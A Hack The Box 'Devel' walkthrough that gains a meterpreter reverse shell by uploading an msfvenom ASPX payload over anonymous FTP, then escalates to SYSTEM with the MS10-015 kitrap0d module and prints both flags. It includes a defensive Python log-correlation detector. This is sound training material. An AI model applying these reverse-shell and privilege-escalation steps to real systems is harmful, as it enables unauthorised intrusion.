HTB | Devel
Walkthrough
Time to Root Machine: ~30min
Write-up Date(s): 4/19/2021
Last Edited: 4/19/2021
Assuming we already have a connection to HTB's network, let's go ahead and scan 10.10.10.5's ports with Nmap:

┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 11:31 EDT
Nmap scan report for 10.10.10.5
Host is up (0.069s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 04-23-21  12:59PM                    0 file
| 04-23-21  01:12PM                    3 file.asp
| 04-23-21  01:12PM                    3 file.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 04-23-21  01:15PM                38359 shell.asp
| 04-23-21  01:15PM                 2737 shell.aspx
| 04-23-21  01:10PM       <DIR>          UCUZGULSZF
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   45.94 ms 10.10.16.1
2   98.26 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.53 seconds
Alright, so a few important things to point out are port 21 [ftp] and port 80 [http]. Digging a little further into port 21, we can see that FTP allows anonymous login, which is a huge plus. Two details in the ftp-anon listing are worth noting right away: iisstart.htm and welcome.png are the stock landing-page files of an IIS 7 web root, so the FTP site and the web site most likely share a directory; and the extra entries (file, file.asp, shell.asp, shell.aspx, UCUZGULSZF) are not part of the box but uploads left behind by other players on the shared lab instance, which is itself a hint about what anonymous users are allowed to do here. Let's go ahead and start with port 21, the FTP port, and log in anonymously:
┌──(root💀kali)-[~]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
So, we didn't find much in the FTP root (this listing, taken on a clean instance, shows only the three stock items), but there is a DIR, in other words a directory, labelled 'aspnet_client'. This could prove helpful, so let's dig a little deeper into it:

ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  02:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
So the deepest folder is named 2_0_50727. That is not an "aspnet_client version" as such: aspnet_client\system_web\<version> is the folder IIS creates under a site's root when ASP.NET is registered with it, and the folder name is the .NET Framework build that did the registering, here 2.0.50727, which is .NET Framework 2.0. The useful takeaway is that this site is set up to execute ASP.NET pages, which could prove handy later, so we will keep it in our notes. Moving on to port 80, we can navigate to the web page and see if we can find anything interesting:
Not much to look at, but the response headers confirm the server version, even though nmap already reported it: Server: Microsoft-IIS/7.5. We will note this down as well, for later use if needed. Now that we have some information to go off of, ASP.NET on .NET Framework 2.0.50727 and the web server Microsoft-IIS/7.5, let's begin by seeing if there are any known vulnerabilities in these two:

┌──(root💀kali)-[~]
└─# searchsploit .net 2.0
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Alt-N WebAdmin 2.0.x - Remote File Disclosure                               | cgi/remote/22542.txt
Alt-N WebAdmin 2.0.x - Remote File Viewing                                  | cgi/remote/22541.txt
gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities       | php/webapps/43431.txt
Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities | windows/remote/30281.txt
Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)                 | windows/dos/3254.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[~]
└─# searchsploit IIS 7.5
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                    | windows/remote/19033.txt
Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC) | windows/dos/15803.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
As you can see, there isn't much to go off of from searchsploit: nothing matches the stack we actually have (IIS 7.5 serving plain ASP.NET, no PHP), and a Google search didn't turn up anything either. Let's circle back to the FTP service and see whether anonymous users are allowed to do anything interesting there, such as writing a file: create a small file locally and try to put it on the server:

┌──(root💀kali)-[~]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10 bytes sent in 0.00 secs (271.2674 kB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
04-23-21  07:02PM                   10 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
Wow, it's as easy as that! The put command dropped the test.txt file we created on our local machine onto the server, so anonymous FTP is writable. Before building on that, it is worth confirming where the write landed: the FTP root holds iisstart.htm and welcome.png, the stock IIS landing-page files, so it is almost certainly the web root too, and a quick request for http://10.10.10.5/test.txt on port 80 will confirm it. If IIS serves our file, then IIS will also execute a file we upload, as long as it is of a type the server hands to a script engine. So, what type of file would be compatible? IIS 7.5 with ASP.NET registered (the aspnet_client folder told us that) runs .asp/.aspx pages, so an .aspx file it is. Let's go ahead and whip one up with a reverse shell:

┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2860 bytes

Two things about this payload matter later: it is x86, and it is staged (windows/meterpreter/reverse_tcp), so whatever catches the connection must be able to send the second stage.
We have created a file labelled 'shell.aspx' containing a meterpreter reverse shell that we can drop onto the server over FTP. Now that we have created the file, let's upload it:

┌──(root💀kali)-[~]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2897 bytes sent in 0.00 secs (47.6344 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
04-23-21  07:06PM                 2897 shell.aspx
04-23-21  07:02PM                   10 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
And there we go! As you can see, we now have test.txt and shell.aspx on the server. Let's test the shell: start a netcat [nc] listener on port 4444, then request http://10.10.10.5/shell.aspx in a browser (or with curl) so that IIS compiles and executes the page, which is what launches the payload:

┌──(root💀kali)-[~]
└─# nc -nvlp 4444 10.10.10.5
listening on [any] 4444 ...
connect to [10.10.16.159] from (UNKNOWN) [10.10.10.5] 49165
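From the server side, the chain just walked through (anonymous STOR of a server-side script into the web root, then an HTTP request for that same path) is easy to spot if the IIS FTP and HTTP logs are correlated. The Python below is an added example written for this write-up, not code from the original page or from Hack The Box. The two log excerpts embedded in it are constructed to mirror the session above; their column order comes from their own #Fields lines, the way IIS 7.5 writes W3C logs, and the 24-hour correlation window is an arbitrary choice.

```python
"""Correlate IIS FTP and HTTP W3C logs to detect a script uploaded over FTP
and then executed through the web server (the Devel chain above:
anonymous STOR shell.aspx, then GET /shell.aspx).

Added example for this write-up, not code from the original page.
The log text below is constructed, not captured from the Devel box."""
import os
from datetime import datetime, timedelta

# Constructed IIS 7.5 FTP log. IIS writes '-' for empty fields and logs
# the password as '***'. Field order is declared by the #Fields line.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip c-port cs-username cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-04-23 19:01:40 10.10.16.159 49201 - USER anonymous 331 0 0 1a2b3c -
2021-04-23 19:01:41 10.10.16.159 49201 anonymous PASS *** 230 0 0 1a2b3c /
2021-04-23 19:02:10 10.10.16.159 49201 anonymous STOR test.txt 226 0 0 1a2b3c /test.txt
2021-04-23 19:06:22 10.10.16.159 49201 anonymous STOR shell.aspx 226 0 0 1a2b3c /shell.aspx
2021-04-23 19:06:30 10.10.14.7 50122 babis STOR notes.docx 226 0 0 9f8e7d /docs/notes.docx
2021-04-23 19:06:45 10.10.16.159 49201 anonymous STOR blocked.asp 550 5 0 1a2b3c /blocked.asp
"""

# Constructed IIS 7.5 HTTP log for the same site (spaces in the UA are '+').
HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-04-23 19:00:05 10.10.10.5 GET /iisstart.htm - 80 - 10.10.16.159 Mozilla/5.0 200 0 0 15
2021-04-23 19:02:30 10.10.10.5 GET /test.txt - 80 - 10.10.16.159 curl/7.74.0 200 0 0 3
2021-04-23 19:07:02 10.10.10.5 GET /shell.aspx - 80 - 10.10.16.159 Mozilla/5.0 200 0 0 812
"""

# Extensions IIS hands to a script engine rather than serving as static content.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".svc", ".cshtml", ".php"}


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names.
    Lines whose column count does not match the header are skipped so a
    truncated line cannot shift values into the wrong columns."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log data before any #Fields header")
        values = line.split()
        if len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def _when(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def _norm(path):
    """Compare FTP and HTTP paths in one form: forward slashes, leading '/', lower case."""
    path = path.replace("\\", "/")
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def script_uploads(ftp_rows):
    """Completed STOR/APPE (sc-status 226) of a file with a script extension."""
    hits = []
    for r in ftp_rows:
        if r["cs-method"] not in ("STOR", "APPE") or r["sc-status"] != "226":
            continue
        raw = r.get("x-fullpath", "-")
        path = _norm(raw if raw != "-" else r["cs-uri-stem"])
        if os.path.splitext(path)[1] in SCRIPT_EXTENSIONS:
            hits.append({"time": _when(r), "client": r["c-ip"],
                         "user": r["cs-username"], "path": path})
    return hits


def correlate(ftp_text, http_text, window=timedelta(hours=24)):
    """Return one finding per script upload: 'critical' if the same path was
    requested over HTTP within `window` after the upload, otherwise 'high'."""
    uploads = script_uploads(parse_w3c(ftp_text))
    requests = parse_w3c(http_text)
    findings = []
    for up in uploads:
        later = [q for q in requests
                 if _norm(q["cs-uri-stem"]) == up["path"]
                 and up["time"] <= _when(q) <= up["time"] + window]
        finding = dict(up, severity="high", executed=None,
                       anonymous=up["user"].lower() == "anonymous")
        if later:
            first = min(later, key=_when)
            finding["severity"] = "critical"
            finding["executed"] = {"time": _when(first), "client": first["c-ip"],
                                   "status": first["sc-status"]}
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in correlate(FTP_LOG, HTTP_LOG):
        print(f"[{f['severity']}] {f['path']} uploaded by {f['user']}@{f['client']} "
              f"at {f['time']}; executed: {f['executed']}")
```

Run it as a script to print the findings, or pass real log text to correlate(). Only a 226 status counts as a completed upload, so a STOR that IIS refused with 550 is ignored, and an anonymous script upload is still reported at 'high' when no request follows, because the file is sitting in a directory the server will execute from.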
We got a connection, which proves the page executes. A plain nc listener cannot take it any further, though: the payload is staged, and only Metasploit's handler knows how to send the meterpreter stage. So let's set up exploit/multi/handler with the matching payload and request shell.aspx again (the session below comes in from source port 49167, a new connection, not the one nc caught):

┌──(root💀kali)-[~]
└─# msfconsole
[!] The following modules could not be loaded!
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.

       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.16.159
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.159:4444
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.16.159:4444 -> 10.10.10.5:49167) at 2021-04-23 12:05:11 -0400
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > getuid
Server username: IIS APPPOOL\Web
Alright, our reverse shell is up and running, as IIS APPPOOL\Web, the application pool identity, which is a low-privileged account. Let's see if we can capture those flags without privesc:

meterpreter > dir
Listing: c:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 22:36:15 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 00:53:55 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 22:37:05 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 22:37:05 -0400  Program Files
40777/rwxrwxrwx   4096   dir   2009-07-13 22:37:05 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2017-03-17 10:17:30 -0400  Recovery
40777/rwxrwxrwx   8192   dir   2017-03-17 07:09:34 -0400  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 22:37:05 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 22:37:05 -0400  Windows
100777/rwxrwxrwx  24     fil   2009-07-13 22:04:04 -0400  autoexec.bat
100666/rw-rw-rw-  10     fil   2009-07-13 22:04:04 -0400  config.sys
40777/rwxrwxrwx   4096   dir   2017-03-17 10:37:31 -0400  inetpub
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cd Users
meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd babis
[-] stdapi_fs_chdir: Operation failed: Access is denied.
meterpreter > cd Administrator
[-] stdapi_fs_chdir: Operation failed: Access is denied.
We can't even enter the user folder, babis, let alone Administrator. Don't be misled by the rwxrwxrwx in the Mode column: Meterpreter renders Windows file attributes as fake Unix modes and does not read the NTFS ACL, so "Access is denied" is the answer that counts. That's OK! Our next option is local privilege escalation. We can use Metasploit's local exploit suggester to discover which common privesc exploits may apply to this server:

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 37 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Read the two result wordings carefully: "The target appears to be vulnerable" means the module's own check passed, while "The service is running, but could not be validated" only means the check could not confirm the build, not that the exploit will fail. Also note that the suggester is collecting exploits for x86/windows, so the box is 32-bit, which is exactly what our x86 payload and the next exploit expect.
Wow, looks like there is quite a bit that could potentially work. Let's try the famous kitrap0d exploit first. It is MS10-015, a kernel bug in the 32-bit Windows VDM support, and its only target is "Windows 2K SP4 - Windows 7 (x86)", which fits this host even though the suggester could not validate it. Two options need fixing before running it: SESSION must point at our existing meterpreter session, and LHOST defaults to 10.0.2.15 (a local interface) and has to be reset to tun0:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.16.159:4444
[*] Launching notepad to host the exploit...
[+] Process 1484 launched.
[*] Reflectively injecting the exploit DLL into 1484...
[*] Injecting exploit into 1484 ...
[*] Exploit injected. Injecting payload into 1484...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.16.159:4444 -> 10.10.10.5:49168) at 2021-04-23 12:11:54 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We now have a second session running as NT AUTHORITY\SYSTEM. That is not a Windows Administrator user account but the LocalSystem service account, which has full control of the machine (more than a member of the local Administrators group gets, and with no UAC in the way), so every user profile is now readable. Let's go ahead and grab those flags; note that the user flag on this box really is named user.txt.txt:

meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd babis/Desktop
meterpreter > cat user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
meterpreter > cd ../../
meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd Administrator/Desktop
meterpreter > cat root.txt
e621a0b5041708797c4fc4728bc72b4b
ROOT FLAG: e621a0b5041708797c4fc4728bc72b4b
USER [babis] FLAG: 9ecdd6a3aedf24b41562fea70f4cb3e8